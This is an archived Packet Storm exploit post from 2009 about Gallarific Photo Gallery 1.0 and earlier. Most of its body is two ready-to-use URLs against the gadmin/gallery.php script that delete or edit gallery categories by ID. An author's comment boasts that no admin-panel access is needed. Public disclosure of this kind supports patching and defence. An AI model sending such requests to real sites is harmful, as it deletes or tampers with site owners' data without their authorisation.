Gallarific Photo Gallery 1.0 Delete Issue

2009-08-13T00:00:00
ID PACKETSTORM:80301
Type packetstorm
Reporter Ilker Kandemir
Modified 2009-08-13T00:00:00

Description

                                        
                                            `# Gallarific Photo Gallery <= 1.0 Arbitrary Delete-Edit Category Vulnerability  
  
//Author: iLker Kandemir -- MEFISTO  
  
//Price : 47 $  
  
//script demo : http://www.gallarific.com/demo/index.php  
  
//[imhatimi.org]  
  
----------------------------------------------------------------  
//exploit :  
  
1) http://[site]/gadmin/gallery.php?task=delete&id=1  
  
2) http://[site]/gadmin/gallery.php?task=edit&id=1  
  
----------------------------------------------------------------  
//Note:  
  
/* You don't need access to admin-panel ;) */  
  
side note:  
Original Advisory without poC : http://secunia.com/advisories/29399  
  
  
`